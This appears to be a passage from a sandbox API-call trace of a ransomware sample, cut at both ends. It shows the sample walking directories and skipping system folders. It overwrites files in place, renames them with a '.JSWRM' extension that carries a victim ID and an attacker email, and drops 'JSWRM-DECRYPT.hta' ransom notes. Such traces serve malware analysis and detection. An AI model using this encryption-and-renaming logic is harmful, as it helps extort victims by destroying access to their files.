lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0059.884] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.884] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=81482) returned 1 [0059.884] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13e40) returned 0x2471a8 [0059.885] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x13e40, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x13e40, lpOverlapped=0x0) returned 1 [0059.897] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.897] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x13e40, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x13e40, lpOverlapped=0x0) returned 1 [0059.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.898] CloseHandle (hObject=0x3d4) returned 1 [0059.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0059.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0059.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0059.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217bf0 [0059.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217bf0 | out: hHeap=0x1e0000) returned 1 [0059.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.901] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0059.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0059.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0059.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0059.901] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.901] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.901] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.901] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0059.901] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.901] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.901] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.901] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.901] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.901] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.901] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0059.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2412b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0059.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0059.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0059.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0059.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0059.902] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.902] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0059.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0059.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.902] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1053", cAlternateFileName="")) returned 1 [0059.902] lstrcmpiW (lpString1="1053", lpString2=".") returned 1 [0059.902] lstrcmpiW (lpString1="1053", lpString2="..") returned 1 [0059.902] lstrcmpiW (lpString1="1053", lpString2="...") returned 1 [0059.902] lstrcmpiW (lpString1="1053", lpString2="windows") returned -1 [0059.902] lstrcmpiW (lpString1="1053", lpString2="recovery") returned -1 [0059.902] lstrcmpiW (lpString1="1053", lpString2="perflogs") returned -1 [0059.902] lstrcmpiW (lpString1="1053", lpString2="documents and settings") returned -1 [0059.902] lstrcmpiW (lpString1="1053", lpString2="$RECYCLE.BIN") returned 1 [0059.902] lstrcmpiW (lpString1="1053", lpString2="system volume information") returned -1 [0059.903] lstrcmpiW (lpString1="1053", lpString2="msocache") returned -1 [0059.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0059.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225c30 [0059.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0059.903] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1053\\jswrm-decrypt.hta")) returned 0xffffffff [0059.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225c30 | out: hHeap=0x1e0000) returned 1 [0059.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0059.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0059.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0059.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225f30 [0059.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0059.904] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1053\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.945] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.945] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.946] CloseHandle (hObject=0x450) returned 1 [0059.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225f30 | out: hHeap=0x1e0000) returned 1 [0059.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0059.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0059.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2261b0 [0059.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0059.947] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1053\\jswrm-decrypt.hta")) returned 0x20 [0059.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2261b0 | out: hHeap=0x1e0000) returned 1 [0059.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.947] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a642d40, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0059.947] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.947] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a642d40, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.947] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.947] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.947] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.947] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.947] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.948] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0059.948] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.948] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.948] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.948] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.948] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.948] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.948] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0059.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0059.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0059.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0059.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0059.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0059.948] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.948] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3865) returned 1 [0059.948] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf10) returned 0x23dc88 [0059.948] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xf10, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xf10, lpOverlapped=0x0) returned 1 [0059.950] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.950] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xf10, lpOverlapped=0x0) returned 1 [0059.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0059.950] CloseHandle (hObject=0x3d4) returned 1 [0059.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0059.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0059.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0059.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0059.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0059.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.952] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0059.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0059.952] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a5d0602, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a5d0602, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a642d40, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.952] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.952] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.952] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.952] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.952] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.952] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.952] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.952] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.952] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0059.953] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.953] 